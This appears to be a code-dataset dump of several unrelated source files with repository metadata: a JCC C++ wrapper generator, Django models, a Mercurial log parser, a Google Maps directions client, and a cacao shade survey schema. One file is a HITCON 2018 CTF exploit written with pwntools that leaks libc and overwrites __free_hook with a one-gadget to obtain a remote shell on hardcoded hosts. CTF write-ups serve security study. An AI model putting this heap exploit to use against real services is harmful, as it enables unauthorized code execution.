not argType.isPrimitive() and '((jobject) NULL)' or '')
sig, check, x = parseArgs([argType], cls)
line(out, indent + 2, 'if (!parseArg(arg, "%s"%s, &value))',
sig, check)
line(out, indent + 2, '{')
line(out, indent + 3, 'INT_CALL(self->object.%s(value));',
methodName)
line(out, indent + 3, 'return 0;')
line(out, indent + 2, '}')
line(out, indent + 1, '}')
line(out, indent + 1, 'PyErr_SetArgsError((PyObject *) self, "%s", arg);',
fieldName)
line(out, indent + 1, 'return -1;')
line(out, indent, '}')
if mappingMethod:
method, cardinality = mappingMethod
if cardinality > 1:
methodName = method.getName()
getName = 't_%s_%s_map_' %(names[-1], methodName)
line(out)
line(out, indent, 'static PyObject *%s(t_%s *self, PyObject *arg)',
getName, names[-1])
line(out, indent, '{')
call(out, indent + 1, cls, False, method, names, 1, isExtension)
line(out)
line(out, indent + 1, 'PyErr_SetArgsError((PyObject *) self, "%s", arg);',
methodName)
line(out, indent + 1, 'return NULL;')
line(out, indent, '}')
if sequenceLenMethod:
method, cardinality = sequenceLenMethod
methodName = method.getName()
lenName = 't_%s_%s_seq_' %(names[-1], methodName)
line(out)
line(out, indent, 'static int %s(t_%s *self)', lenName, names[-1])
line(out, indent, '{')
line(out, indent + 1, '%s len;',
typename(method.getReturnType(), cls, False))
line(out, indent + 1, 'INT_CALL(len = self->object.%s());', methodName)
line(out, indent + 1, 'return (int) len;')
line(out, indent, '}')
if sequenceGetMethod:
method, cardinality = sequenceGetMethod
methodName = method.getName()
returnType = method.getReturnType()
getName = 't_%s_%s_seq_' %(names[-1], methodName)
line(out)
line(out, indent, 'static PyObject *%s(t_%s *self, int n)', getName, names[-1])
line(out, indent, '{')
line(out, indent + 1, '%s result%s;',
typename(returnType, cls, False),
not returnType.isPrimitive() and '((jobject) NULL)' or '')
line(out, indent + 1, 'OBJ_CALL(result = self->object.%s((%s) n));',
methodName, typename(method.getParameterTypes()[0], cls, False))
line(out, indent + 1, returnValue(cls, returnType, 'result'))
line(out, indent, '}')
while indent:
indent -= 1
line(out, indent, '}')
def package(out, allInOne, cppdir, namespace, names):
if not allInOne:
out = file(os.path.join(os.path.join(cppdir, *names),
'__init__.cpp'), 'w')
if allInOne and not names or not allInOne:
line(out, 0, '#include <jni.h>')
line(out, 0, '#include <Python.h>')
line(out, 0, '#include "JCCEnv.h"')
line(out, 0, '#include "functions.h"')
if not names:
line(out)
line(out, 0, 'PyObject *initVM(PyObject *module, PyObject *args, PyObject *kwds);')
packages = []
types = []
namespaces = namespace.items()
sort(namespaces, key=lambda x: x[0])
for name, entries in namespaces:
if entries is True:
if names:
line(out, 0, '#include "%s/%s.h"', '/'.join(names), name)
else:
line(out, 0, '#include "%s.h"', name)
types.append(name)
else:
packages.append((name, entries))
indent = 0
if names:
line(out)
for name in names:
line(out, indent, 'namespace %s {', cppname(name))
indent += 1
line(out);
for name, entries in packages:
line(out, indent, 'namespace %s {', cppname(name))
line(out, indent + 1, 'void __install__(PyObject *module);')
line(out, indent + 1, 'void __initialize__(PyObject *module);')
line(out, indent, '}')
line(out)
line(out, indent, 'void __install__(PyObject *module)')
line(out, indent, '{')
for name in types:
line(out, indent + 1, 't_%s::install(module);', name)
for name, entries in packages:
line(out, indent + 1, '%s::__install__(module);', cppname(name))
line(out, indent, '}')
line(out)
if not names:
line(out, indent, 'PyObject *__initialize__(PyObject *module, PyObject *args, PyObject *kwds)')
line(out, indent, '{')
line(out, indent + 1, 'PyObject *env = initVM(module, args, kwds);')
line(out)
line(out, indent + 1, 'if (env == NULL)')
line(out, indent + 2, 'return NULL;')
line(out)
line(out, indent + 1, 'try {');
indent += 1
else:
line(out, indent, 'void __initialize__(PyObject *module)')
line(out, indent, '{')
for name in types:
line(out, indent + 1, 't_%s::initialize(module);', name)
for name, entries in packages:
line(out, indent + 1, '%s::__initialize__(module);', cppname(name))
if not names:
line(out, indent + 1, 'return env;')
indent -= 1
line(out, indent + 1, '} catch (JCCEnv::exception e) {')
line(out, indent + 2, 'PyErr_SetJavaError(e.throwable);')
line(out, indent + 2, 'return NULL;')
line(out, indent + 1, '}')
line(out, indent, '}')
while indent:
indent -= 1
line(out, indent, '}')
if not allInOne:
out.close()
else:
line(out)
for name, entries in packages:
package(out, allInOne, cppdir, entries, names + (name,))
def module(out, allInOne, classes, cppdir, moduleName, shared):
extname = '_%s' %(moduleName)
line(out, 0, '#include <Python.h>')
line(out, 0, '#include "macros.h"')
line(out, 0, '#include "jccfuncs.h"')
if allInOne:
out_init = file(os.path.join(cppdir, '__init__.cpp'), 'w')
namespaces = {}
for cls in classes:
namespace = namespaces
classNames = cls.getName().split('.')
for className in classNames[:-1]:
namespace = namespace.setdefault(className, {})
namespace[classNames[-1]] = True
if allInOne:
package(out_init, True, cppdir, namespaces, ())
out_init.close()
else:
package(None, False, cppdir, namespaces, ())
line(out)
line(out, 0, 'PyObject *initJCC(PyObject *module);')
line(out, 0, 'void __install__(PyObject *module);')
line(out, 0, 'extern PyTypeObject JObject$$Type, ConstVariableDescriptor$$Type, FinalizerClass$$Type, FinalizerProxy$$Type;')
line(out, 0, 'extern void _install_jarray(PyObject *);')
line(out)
line(out, 0, 'extern "C" {')
line(out)
line(out, 1, 'void init%s(void)', extname)
line(out, 1, '{')
line(out, 2, 'PyObject *module = Py_InitModule3("%s", jcc_funcs, "");',
extname);
line(out)
line(out, 2, 'initJCC(module);')
line(out)
line(out, 2, 'INSTALL_TYPE(JObject, module);')
line(out, 2, 'INSTALL_TYPE(ConstVariableDescriptor, module);')
line(out, 2, 'INSTALL_TYPE(FinalizerClass, module);')
line(out, 2, 'INSTALL_TYPE(FinalizerProxy, module);')
line(out, 2, '_install_jarray(module);')
line(out, 2, '__install__(module);')
line(out, 1, '}')
line(out, 0, '}')
def compile(env, jccPath, output, moduleName, install, dist, debug, jars,
version, prefix, root, install_dir, use_distutils,
shared, compiler, modules, wininst):
try:
if use_distutils:
raise ImportError
from setuptools import setup, Extension
with_setuptools = True
if shared and not SHARED:
raise NotImplementedError, "JCC was not built with --shared mode support, see JCC's INSTALL file for more information"
except ImportError:
if python_ver < '2.4':
raise ImportError, 'setuptools is required when using Python 2.3'
if shared:
raise ImportError, 'setuptools is required when using --shared'
from distutils.core import setup, Extension
with_setuptools = False
extname = '_%s' %(moduleName)
modulePath = os.path.join(output, moduleName)
if not os.path.isdir(modulePath):
os.makedirs(modulePath)
out = file(os.path.join(modulePath, '__init__.py'), 'w')
line(out)
if shared:
line(out, 0, "import os, sys")
line(out)
line(out, 0, "if sys.platform == 'win32':")
line(out, 1, "import jcc, %s", extname)
line(out, 0, "else:")
line(out, 1, "import %s", extname)
else:
line(out, 0, 'import os, %s', extname)
line(out)
line(out, 0, '__dir__ = os.path.abspath(os.path.dirname(__file__))')
package_data = []
for jar in jars:
shutil.copy2(jar, modulePath)
package_data.append(os.path.basename(jar))
if modules:
for module in modules:
pfile = module.split('.')[0] + '.py'
shutil.copy2(pfile, modulePath)
pfile = os.path.basename(pfile)
cfile = pfile + (__debug__ and 'c' or 'o')
py_compile.compile(os.path.join(modulePath, pfile),
os.path.join(modulePath, cfile),
doraise=True)
line(out)
line(out, 0, 'class JavaError(Exception):')
line(out, 1, 'def getJavaException(self):')
line(out, 2, 'return self.args[0]')
line(out, 1, 'def __str__(self):')
line(out, 2, 'writer = %s.StringWriter()', extname)
line(out, 2, 'self.getJavaException().printStackTrace(%s.PrintWriter(writer))', extname)
line(out, 2, 'return "\\n".join((super(JavaError, self).__str__(), " Java stacktrace:", str(writer)))')
line(out)
line(out, 0, 'class InvalidArgsError(Exception):')
line(out, 1, 'pass')
line(out)
line(out, 0, '%s._setExceptionTypes(JavaError, InvalidArgsError)', extname)
if version:
line(out)
line(out, 0, 'VERSION = "%s"', version)
line(out, 0, 'CLASSPATH = [%s]' %(', '.join(['os.path.join(__dir__, "%s")' %(os.path.basename(jar)) for jar in jars])))
line(out, 0, 'CLASSPATH = os.pathsep.join(CLASSPATH)')
line(out)
line(out, 0, 'from %s import *', extname)
out.close()
includes = [os.path.join(output, extname),
os.path.join(jccPath, 'sources')]
sources = ['JObject.cpp', 'JArray.cpp', 'functions.cpp', 'types.cpp']
if not shared:
sources.append('jcc.cpp')
sources.append('JCCEnv.cpp')
for source in sources:
shutil.copy2(os.path.join(jccPath, 'sources', source),
os.path.join(output, extname))
sources = []
for path, dirs, names in os.walk(os.path.join(output, extname)):
for name in names:
if name.endswith('.cpp'):
sources.append(os.path.join(path, name))
script_args = ['build_ext']
includes[0:0] = INCLUDES
compile_args = CFLAGS
link_args = LFLAGS
defines=['PYTHON']
if compiler:
script_args.append('--compiler=%s' %(compiler))
if shared:
defines.append('_jcc_shared')
script_args.append('--define=%s' %(','.join(defines)))
if debug:
script_args.append('--debug')
compile_args += DEBUG_CFLAGS
elif sys.platform == 'win32':
pass
elif sys.platform == 'sunos5':
link_args.append('-Wl,-s')
else:
link_args.append('-Wl,-S')
if install:
script_args.append('install')
if prefix:
script_args.append('--prefix=%s' % prefix)
if root:
script_args.append('--root=%s' % root)
if install_dir:
script_args.append('--install-lib=%s' % install_dir)
if dist:
if wininst:
script_args.append('bdist_wininst')
elif with_setuptools:
script_args.append('bdist_egg')
else:
script_args.append('bdist')
args = {
'extra_compile_args': compile_args,
'extra_link_args': link_args,
'include_dirs': includes,
'sources': sources
}
if shared:
shlibdir = os.path.dirname(os.path.dirname(_jcc.__file__))
if sys.platform == 'darwin': # distutils no good with -R
machine = platform.machine()
if machine.startswith('iPod') or machine.startswith('iPhone'):
args['extra_link_args'] += ['-L' + shlibdir]
else:
args['extra_link_args'] += ['-Wl,-rpath', shlibdir]
args['library_dirs'] = [shlibdir]
args['libraries'] = ['jcc']
elif sys.platform == 'linux2': # distutils no good with -R
args['extra_link_args'] += ['-Wl,-rpath', shlibdir]
args['library_dirs'] = [shlibdir]
args['libraries'] = ['jcc']
elif sys.platform == 'win32':
jcclib = 'jcc%s.lib' %(debug and '_d' or '')
args['extra_link_args'] += [os.path.join(shlibdir, 'jcc', jcclib)]
else:
raise NotImplementedError, "shared mode on %s" %(sys.platform)
extensions = [Extension('.'.join([moduleName, extname]), **args)]
args = {
'name': moduleName,
'packages': [moduleName],
'package_dir': {moduleName: modulePath},
'package_data': {moduleName: package_data},
'version': version,
'ext_modules': extensions,
'script_args': script_args
}
if with_setuptools:
args['zip_safe'] = False
setup(**args)
| gpl-2.0 | 2,680,661,775,088,932,400 | 38.441541 | 196 | 0.528841 | false | 3.7268 | false | false | false |
scwuaptx/CTF | 2018-writeup/hitcon/children_tcache.py | 1 | 1235 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
host = "10.211.55.19"
#host = "52.68.236.186"
#port = 56746
host = "54.178.132.125"
port = 8763
r = remote(host,port)
def allocate(size,data):
r.recvuntil(":")
r.sendline("1")
r.recvuntil("e:")
r.sendline(str(size))
r.recvuntil("a:")
r.send(data)
def show(idx):
r.recvuntil(":")
r.sendline("2")
r.recvuntil("x:")
r.sendline(str(idx))
def free(idx):
r.recvuntil(":")
r.sendline("3")
r.recvuntil("x:")
r.sendline(str(idx))
for i in range(6):
allocate(0x80,"a")
allocate(0x38,"a") #6
allocate(0x4e0+0x490,"b") #7
allocate(0x410,"c") #8
allocate(0x80,"d") #9
free(7)
free(6)
allocate(0x68,"c"*0x68) #6
allocate(0x80,"d"*0x78) #7
free(5)
allocate(0x60,"da") #5
for i in range(5) :
free(i)
free(9)
free(7)
free(8)
allocate(0x90,"ccc")
allocate(0x7f0-0xa0,"d")
allocate(0x50,"d")
free(5)
allocate(0x30,"a")
allocate(0x60,"a")
allocate(0x20,"gg")
show(4)
libc = u64(r.recvuntil("\n")[:-1].ljust(8,"\x00")) - 0x3ebca0
print hex(libc)
free_hook = libc + 0x3ed8e8
free(0)
allocate(0xa0,"b"*0x70 + p64(free_hook))
allocate(0x90,"b")
magic = libc +0x4f322
allocate(0x90,p64(magic))
free(5)
r.interactive()
| gpl-2.0 | -9,162,183,849,842,138,000 | 15.689189 | 61 | 0.614575 | false | 2.213262 | false | false | false |
markdrago/flypaper | src/mercurial_repo.py | 1 | 2562 | import os
import subprocess
from datetime import datetime
from changeset_list import ChangesetList
from changeset import Changeset
class MercurialRepo(object):
def __init__(self, repodir):
self._repodir = repodir
#NOTE: Since a commit may have 0 files changed (merge), we add a preceding
# '#' to the lines which contain the description and modified files.
#We do this to avoid having 3 consecutive newlines. That would cause a
#problem since we're using newlines (and double newlines) as a delimiter.
#We use newlines because they will not be present in the description once
#we force it to just show the first line and it won't show up in the list
#of files either. This way we can get all of the data we need with one
#command and we will be able to break it up safely and reliably.
def get_full_changesetlist(self, startdate, changeset_list):
"return ChangesetList of all changesets since startdate"
datestr = startdate.strftime('%Y-%m-%d')
hg_format = '{node}\n{date|shortdate}\n#{desc|firstline}\n#{files}\n\n'
cmd = 'hg log -d ">' + datestr + '" --template "' + hg_format + '"'
result = self.get_command_output(cmd)
self._populate_changeset_list(result, changeset_list)
def _populate_changeset_list(self, full_logoutput, changeset_list):
for nodeblock in full_logoutput.split("\n\n"):
changeset = self._create_single_changeset(nodeblock)
if changeset is not None:
changeset_list.add(changeset)
def _create_single_changeset(self, logoutput):
if logoutput.strip() == '':
return None
(commitid, datestr, desc, files) = [
x.strip() for x in logoutput.split("\n", 3)
]
#remove those awkward prefixed # characters
desc = desc[1:].strip()
files = files[1:].strip()
date = datetime.strptime(datestr, '%Y-%m-%d')
#create the base changeset
changeset = Changeset(commitid, date, desc)
#add the modified files to the changeset
if files.strip() != '':
for filename in files.split(' '):
changeset.add_modified_file(filename)
return changeset
def get_command_output(self, cmd):
"run a shell command and get the output"
oldpath = os.getcwd()
os.chdir(self._repodir)
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
result = proc.communicate()[0]
os.chdir(oldpath)
return result
| mit | -5,807,498,315,869,296,000 | 37.238806 | 79 | 0.639344 | false | 4.041009 | false | false | false |
cogumbreiro/relay | ui/relay/warnings/models.py | 1 | 11533 | from django.db import models
from django.db.models import permalink
import re
import sys
def warn(msg):
sys.stderr.write(msg)
class Code_base(models.Model):
program_name = models.CharField(max_length=50, core=True)
version = models.CharField(max_length=40, core=True)
compile_options = models.CharField(max_length=100)
def __str__(self):
return "%s v.%s" % (self.program_name, self.version)
def get_absolute_url(self):
return ('relay.warnings.views.code_detail', [str(self.id)])
get_absolute_url = permalink(get_absolute_url)
class Admin:
# Admin options go here
pass
class Note(models.Model):
explaination = models.TextField(core=True)
last_updated = models.DateTimeField(core=True, auto_now=True)
def __str__(self):
return "%s %s" % (self.explaination, self.last_updated)
class Admin:
# Admin options go here
pass
class Label(models.Model):
label = models.CharField(max_length=50, core=True)
example = models.TextField(core=True)
def __str__(self):
return self.label
class Admin:
# Admin options go here
pass
def first_labels(n, ls):
reduce(lambda x, y: x + ", " + y, ls.all()[0:n], "")
class Function(models.Model):
cil_id = models.IntegerField(core=True, db_index=True)
name = models.CharField(max_length=50, core=True)
labels = models.ManyToManyField(Label, filter_interface=models.VERTICAL)
program = models.ForeignKey(Code_base, limit_choices_to={})
def __str__(self):
return "%s (%d)" % (self.name, self.cil_id)
def first_labels(self):
return first_labels(2, self.labels)
class Admin:
list_display = ('cil_id', 'name', 'program', 'first_labels')
class Program_point(models.Model):
file_name = models.CharField(max_length=100, core=True)
line_num = models.IntegerField(core=True, db_index=True)
parent_function = models.ForeignKey(Function,
null=True, limit_choices_to={})
def __str__(self):
return "%d in %s" % (self.line_num, self.file_name)
class Admin:
# Admin options go here
pass
class Lval(models.Model):
var_id = models.IntegerField(null=True, db_index=True)
printed = models.CharField(max_length=100, core=True)
rep_size = models.IntegerField(null=True)
declared_at = models.ForeignKey(Program_point, null=True)
is_global = models.BooleanField()
def __str__(self):
s = self.printed
if (self.var_id):
s += " (%d)" % self.var_id
if (self.rep_size):
s += " |%d|" % self.rep_size
return s
class Admin:
# Admin options go here
pass
class Call_path(models.Model):
root_function = models.ForeignKey(Function, limit_choices_to={})
spawn_site = models.ForeignKey(Program_point,
related_name="spawns", limit_choices_to={})
empty_ls = models.ForeignKey(Program_point,
related_name="empty_ls", null=True,
limit_choices_to={})
# not including the edges right now...
def __str__(self):
return self.root_function.__str__() + " -> ..."
def program(self):
return str(self.root_function.program)
class Admin:
list_display = ('program', 'root_function', 'spawn_site')
class Call_edge(models.Model):
path = models.ForeignKey(Call_path, limit_choices_to={})
caller = models.ForeignKey(Function, related_name="is_caller",
limit_choices_to={})
callee = models.ForeignKey(Function, related_name="is_callee",
limit_choices_to={})
def __str__(self):
return str(self.caller) + " -> " + str(self.callee)
class Admin:
# Admin options go here
pass
class Access(models.Model):
lval = models.ForeignKey(Lval, related_name="reads_writes")
accessed_through = models.ForeignKey(Call_path)
occurs_at = models.ForeignKey(Program_point)
locks = models.ManyToManyField(Lval, filter_interface=models.VERTICAL)
def __str__(self):
return str(self.lval) + " @ " + str(self.occurs_at)
def has_lock(self):
return len(self.locks.all()[:1]) != 0
has_lock.boolean = True
class Admin:
list_display = ('lval', 'occurs_at', 'has_lock')
search_fields = ['occurs_at']
class Run(models.Model):
time_of_run = models.DateTimeField(editable=True, auto_now_add=True)
code = models.ForeignKey(Code_base, limit_choices_to={})
changes_to_analysis = models.TextField(core=True)
analysis_settings = models.TextField(core=True)
def __str__(self):
return str(self.code) + " " + str(self.time_of_run)
def get_absolute_url(self):
return ('relay.warnings.views.run_detail', [str(self.id)])
get_absolute_url = permalink(get_absolute_url)
class Admin:
list_display = ('id', 'code', 'time_of_run')
list_filter = ('code', 'time_of_run')
class Race(models.Model):
access1 = models.ForeignKey(Access, core=True, related_name="racy1")
access2 = models.ForeignKey(Access, core=True, related_name="racy2")
note = models.ForeignKey(Note, core=True, null=True)
labels = models.ManyToManyField(Label, filter_interface=models.VERTICAL)
def __str__(self):
return str(self.access1) + " [X] " + str(self.access2)
def first_labels(self):
return first_labels(2, self.labels)
def add_label(self, label):
self.labels.add(label)
def remove_label(self, label):
self.labels.remove(label)
class Admin:
list_display = ('access1', 'access2', 'first_labels')
class Race_cluster(models.Model):
races = models.ManyToManyField(Race, filter_interface=models.VERTICAL)
run = models.ForeignKey(Run)
cluster_id = models.IntegerField(null=True, core=True)
def program(self):
return str(self.run.code)
def first_race(self):
return str(self.races.all()[0])
def get_absolute_url(self):
return ('relay.warnings.views.warn_detail', [str(self.id)])
get_absolute_url = permalink(get_absolute_url)
def add_label(self, label):
for r in self.races.all():
r.add_label(label)
def remove_label(self, label):
for r in self.races.all():
r.remove_label(label)
class Admin:
list_display = ('program', 'run', 'first_race')
list_filter = ('run',)
#---- Constructors that either get old matches, or creates new objs -----
def getCodeBase(name, ver, opt):
return Code_base.objects.get_or_create (program_name=name, version=ver, compile_options = opt)
def getFunc(c_id, n, prog):
c_id = int(c_id)
return Function.objects.get_or_create (cil_id=c_id, name=n, program=prog)
def findFunc(c_id, prog):
try:
c_id = int(c_id)
f = Function.objects.get(cil_id=c_id, program=prog)
return f
except:
warn('Function not found %d\n' % c_id)
return None
def getPP(f, line, parent):
args = {'line_num' : int(line), 'file_name' : f}
# NULL != NULL in SQL sucks...
if (parent == None):
args['parent_function__isnull'] = True
else:
args['parent_function'] = parent
obj, created = Program_point.objects.get_or_create(**args)
return obj
def getLval(vid, p_rep, size, decl, glob):
# NULL != NULL in SQL sucks...
args = {'printed' : p_rep , 'is_global' : glob }
if (vid == None):
args['var_id__isnull'] = True
else:
args['var_id'] = int(vid)
if(size == None):
args['rep_size__isnull'] = True
else:
args['rep_size'] = int(size)
if(decl == None):
args['declared_at__isnull'] = True
else:
args['declared_at'] = decl
obj, created = Lval.objects.get_or_create(**args)
return obj
def getCallpath(root, spawn, empty_at, edges):
found = None
args = { 'root_function' : root, 'spawn_site' : spawn }
filt_args = {}
create_args = {}
filt_args.update(args)
if (empty_at == None):
filt_args['empty_ls__isnull'] = True
else:
filt_args['empty_ls'] = empty_at
matches = Call_path.objects.select_related().filter(**filt_args)
edges.sort()
# see which of the old call paths have the same set of edges
for o in matches:
db_edges = Call_edge.objects.filter(path=o).order_by(
'caller', 'callee')
e = [(e.caller, e.callee) for e in db_edges]
if (e == edges) :
found = o
break
# if it didn't find any call paths w/ the same set of edges
if (not found) :
create_args.update(args)
create_args['empty_ls'] = empty_at
found = Call_path.objects.create(**create_args)
for (f1, f2) in edges :
Call_edge.objects.create(path=found, caller=f1, callee=f2)
return found
#-------- Access factories
def matchLocksAccesses (accessMatches, locks):
found = None
for old in accessMatches:
db_l = list(old.locks.all())
if (db_l == locks) :
found = old
break
if (not found) :
found = Access.objects.create(lval=lv,accessed_through=cp,occurs_at=pp)
found.locks = locks
found.save()
return found
def getAccess(lv, cp, pp, locks):
# make sure lists are in sorted order before comparing
locks.sort()
matches = Access.objects.select_related().filter(lval=lv, accessed_through=cp, occurs_at=pp)
# see which of the old accesses have the same set of locks
found = matchLocksAccesses (matches, locks)
return found
def createAccess(lv, cp, pp, locks):
acc = Access.objects.create(lval=lv, accessed_through=cp, occurs_at=pp)
acc.locks = locks
acc.save()
return acc
def getAccesses(lv, cp, pps, locks):
res = []
locks.sort()
outer_matches = Access.objects.filter(lval=lv, accessed_through=cp)
for pp in pps:
matches = outer_matches.select_related().filter(occurs_at=pp)
# see which of the old accesses have the same set of locks
found = matchLocksAccesses (matches, locks)
res.append(found)
return res
#----------
def getRace(acc1, acc2):
new, created = Race.objects.get_or_create(access1=acc1, access2=acc2)
return new
def createRace(acc1, acc2):
race = Race(access1=acc1, access2=acc2)
race.save()
return race
# Not useful -- use createRaceCluster instead
def getRaceCluster(races, _run):
found = None
races.sort()
matches = Race_cluster.objects.select_related().filter(run = _run)
for old in matches:
o_r = list(old.races.all())
if (o_r == races):
found = old
break
if (not found):
found = Race_cluster.objects.create(run = _run)
found.races = races
found.save()
return found
# Just create a new cluster and allow duplicates (won't happen, unless)
# you try to re-use an old "run"
def createRaceCluster(cid, races, run):
# None != NULL in the Django mapping sucks...
r = Race_cluster.objects.create(run = run)
r.races = races
if (cid != None):
r.cluster_id = int(cid)
else:
print "Didn't have cluster_id"
r.save()
return r
# Add labels to races
def getLabel(labName):
lab, created = Label.objects.get_or_create(label=labName)
return lab
# TODO add label to any race clusters that match a certain location
| bsd-3-clause | -4,808,662,429,024,099,000 | 32.623907 | 98 | 0.613197 | false | 3.433462 | false | false | false |
DataReply/google-maps-services-python | googlemaps/directions.py | 12 | 5126 | #
# Copyright 2014 Google Inc. All rights reserved.
#
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
#
"""Performs requests to the Google Maps Directions API."""
from googlemaps import convert
def directions(client, origin, destination,
mode=None, waypoints=None, alternatives=False, avoid=None,
language=None, units=None, region=None, departure_time=None,
arrival_time=None, optimize_waypoints=False, transit_mode=None,
transit_routing_preference=None):
"""Get directions between an origin point and a destination point.
:param origin: The address or latitude/longitude value from which you wish
to calculate directions.
:type origin: string or dict or tuple
:param destination: The address or latitude/longitude value from which
you wish to calculate directions.
:type destination: string or dict or tuple
:param mode: Specifies the mode of transport to use when calculating
directions. One of "driving", "walking", "bicycling" or "transit"
:type mode: string
:param waypoints: Specifies an array of waypoints. Waypoints alter a
route by routing it through the specified location(s).
:param alternatives: If True, more than one route may be returned in the
response.
:type alternatives: bool
:param avoid: Indicates that the calculated route(s) should avoid the
indicated features.
:type avoid: list or string
:param language: The language in which to return results.
:type language: string
:param units: Specifies the unit system to use when displaying results.
"metric" or "imperial"
:type units: string
:param region: The region code, specified as a ccTLD ("top-level domain"
two-character value.
:type region: string
:param departure_time: Specifies the desired time of departure.
:type departure_time: int or datetime.datetime
:param arrival_time: Specifies the desired time of arrival for transit
directions. Note: you can't specify both departure_time and
arrival_time.
:type arrival_time: int or datetime.datetime
:param optimize_waypoints: Optimize the provided route by rearranging the
waypoints in a more efficient order.
:type optimize_waypoints: bool
:param transit_mode: Specifies one or more preferred modes of transit.
This parameter may only be specified for requests where the mode is
transit. Valid values are "bus", "subway", "train", "tram", "rail".
"rail" is equivalent to ["train", "tram", "subway"].
:type transit_mode: string or list of strings
:param transit_routing_preference: Specifies preferences for transit
requests. Valid values are "less_walking" or "fewer_transfers"
:type transit_routing_preference: string
:rtype: list of routes
"""
params = {
"origin": _convert_waypoint(origin),
"destination": _convert_waypoint(destination)
}
if mode:
# NOTE(broady): the mode parameter is not validated by the Maps API
# server. Check here to prevent silent failures.
if mode not in ["driving", "walking", "bicycling", "transit"]:
raise ValueError("Invalid travel mode.")
params["mode"] = mode
if waypoints:
waypoints = convert.as_list(waypoints)
waypoints = [_convert_waypoint(waypoint) for waypoint in waypoints]
if optimize_waypoints:
waypoints = ["optimize:true"] + waypoints
params["waypoints"] = convert.join_list("|", waypoints)
if alternatives:
params["alternatives"] = "true"
if avoid:
params["avoid"] = convert.join_list("|", avoid)
if language:
params["language"] = language
if units:
params["units"] = units
if region:
params["region"] = region
if departure_time:
params["departure_time"] = convert.time(departure_time)
if arrival_time:
params["arrival_time"] = convert.time(arrival_time)
if departure_time and arrival_time:
raise ValueError("Should not specify both departure_time and"
"arrival_time.")
if transit_mode:
params["transit_mode"] = convert.join_list("|", transit_mode)
if transit_routing_preference:
params["transit_routing_preference"] = transit_routing_preference
return client._get("/maps/api/directions/json", params)["routes"]
def _convert_waypoint(waypoint):
if not convert.is_string(waypoint):
return convert.latlng(waypoint)
return waypoint
| apache-2.0 | 4,944,768,763,200,504,000 | 33.870748 | 79 | 0.677917 | false | 4.150607 | false | false | false |
shiminasai/ciat_plataforma | guias_cacao/models.py | 2 | 153154 | # -*- coding: utf-8 -*-
from django.db import models
from django.contrib.auth.models import User
from mapeo.models import Persona
from sorl.thumbnail import ImageField
from multiselectfield import MultiSelectField
# Create your models here.
class FichaSombra(models.Model):
productor = models.ForeignKey(
Persona,
verbose_name='Nombre de productor o productora',
related_name='persona_productor')
tecnico = models.ForeignKey(
Persona,
verbose_name='Nombre de técnico',
related_name='persona_tecnico')
fecha_visita = models.DateField()
def __unicode__(self):
return self.productor.nombre
class Meta:
verbose_name = "Ficha sombra"
verbose_name_plural = "Ficha sombra"
class Foto1(models.Model):
"""docstring for Foto1"""
foto = ImageField(upload_to='foto1Sombra')
ficha = models.ForeignKey(FichaSombra)
CHOICE_TIPO_PUNTO = (
(1, 'Perennifolia'),
(2, 'Caducifolia'),
)
CHOICE_TIPO_USO_PUNTO = (
(1, 'Leña'),
(2, 'Fruta'),
(3, 'Madera'),
(4, 'Sombra'),
(5, 'Nutrientes'),
)
class Especies(models.Model):
nombre = models.CharField('Nombre de la especie', max_length=250)
nombre_cientifico = models.CharField('Nombre cientifico de la especie', max_length=250, blank=True, null=True)
tipo = models.IntegerField(choices=CHOICE_TIPO_PUNTO, blank=True, null=True)
tipo_uso = MultiSelectField(choices=CHOICE_TIPO_USO_PUNTO, verbose_name='Tipo de uso', blank=True, null=True)
foto = ImageField(upload_to='fotoEspecies', blank=True, null=True)
#pequenio
p_altura = models.FloatField('Altura en (mt)', blank=True, null=True)
p_diametro = models.FloatField('Diametro en (cm)', blank=True, null=True)
p_ancho = models.FloatField('Ancho copa en (mt)s', blank=True, null=True)
#mediano
m_altura = models.FloatField('Altura en (mt)', blank=True, null=True)
m_diametro = models.FloatField('Diametro en (cm)', blank=True, null=True)
m_ancho = models.FloatField('Ancho copa en (mt)s', blank=True, null=True)
#grande
g_altura = models.FloatField('Altura en (mt)', blank=True, null=True)
g_diametro = models.FloatField('Diametro en (cm)', blank=True, null=True)
g_ancho = models.FloatField('Ancho copa en (mt)s', blank=True, null=True)
def __unicode__(self):
return self.nombre
class Meta:
verbose_name = "Especie"
verbose_name_plural = "Especies"
CHOICE_TIPO_COPA_PUNTO = (
(1, 'Copa ancha'),
(2, 'Copa angosta'),
(3, 'Copa mediana'),
)
class Punto1(models.Model):
especie = models.ForeignKey(Especies)
pequena = models.FloatField(verbose_name='Pequeña')
mediana = models.FloatField(verbose_name='Mediana')
grande = models.FloatField(verbose_name='Grande')
tipo = models.IntegerField(choices=CHOICE_TIPO_PUNTO)
tipo_de_copa = models.IntegerField(choices=CHOICE_TIPO_COPA_PUNTO)
uso = models.IntegerField(choices=CHOICE_TIPO_USO_PUNTO)
ficha = models.ForeignKey(FichaSombra)
class Meta:
verbose_name_plural = "Punto1"
class Cobertura1(models.Model):
cobertura = models.FloatField('% de cobertura de sombra')
ficha = models.ForeignKey(FichaSombra)
#------------------- fin de punto 1 --------------------------------------
class Foto2(models.Model):
"""docstring for Foto2"""
foto = ImageField(upload_to='foto2Sombra')
ficha = models.ForeignKey(FichaSombra)
class Punto2(models.Model):
especie = models.ForeignKey(Especies)
pequena = models.FloatField(verbose_name='Pequeña')
mediana = models.FloatField(verbose_name='Mediana')
grande = models.FloatField(verbose_name='Grande')
tipo = models.IntegerField(choices=CHOICE_TIPO_PUNTO)
tipo_de_copa = models.IntegerField(choices=CHOICE_TIPO_COPA_PUNTO)
uso = models.IntegerField(choices=CHOICE_TIPO_USO_PUNTO)
ficha = models.ForeignKey(FichaSombra)
class Meta:
verbose_name_plural = "Punto2"
class Cobertura2(models.Model):
cobertura = models.FloatField('% de cobertura de sombra')
ficha = models.ForeignKey(FichaSombra)
#------------------- fin de punto 2 --------------------------------------
class Foto3(models.Model):
"""docstring for Foto3"""
foto = ImageField(upload_to='foto3Sombra')
ficha = models.ForeignKey(FichaSombra)
class Punto3(models.Model):
especie = models.ForeignKey(Especies)
